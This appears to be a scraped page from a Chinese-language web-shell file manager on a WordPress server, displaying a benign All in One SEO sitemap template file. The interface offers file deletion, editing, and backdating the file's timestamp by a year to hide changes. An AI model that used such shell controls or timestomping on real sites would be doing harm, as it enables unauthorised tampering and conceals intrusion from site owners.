文件操作 - root.php
返回文件管理
返回主菜单
删除本文件
文件: /home/www/public/wp-content/plugins/all-in-one-seo-pack/app/Common/Views/sitemap/xml/root.php
编辑文件内容
<?php /** * XML template for our root index page. * * @since 4.0.0 */ // Exit if accessed directly. if ( ! defined( 'ABSPATH' ) ) { exit; } // phpcs:disable ?> <sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <?php foreach ( $entries as $entry ) { if ( empty( $entry['loc'] ) ) { continue; } ?> <sitemap> <loc><?php aioseo()->sitemap->output->escapeAndEcho( $entry['loc'] ); ?></loc><?php if ( ! empty( $entry['lastmod'] ) ) { ?> <lastmod><?php aioseo()->sitemap->output->escapeAndEcho( $entry['lastmod'] ); ?></lastmod><?php } ?> </sitemap> <?php } ?> </sitemapindex>
修改文件时间
将文件时间修改为当前时间的前一年
删除文件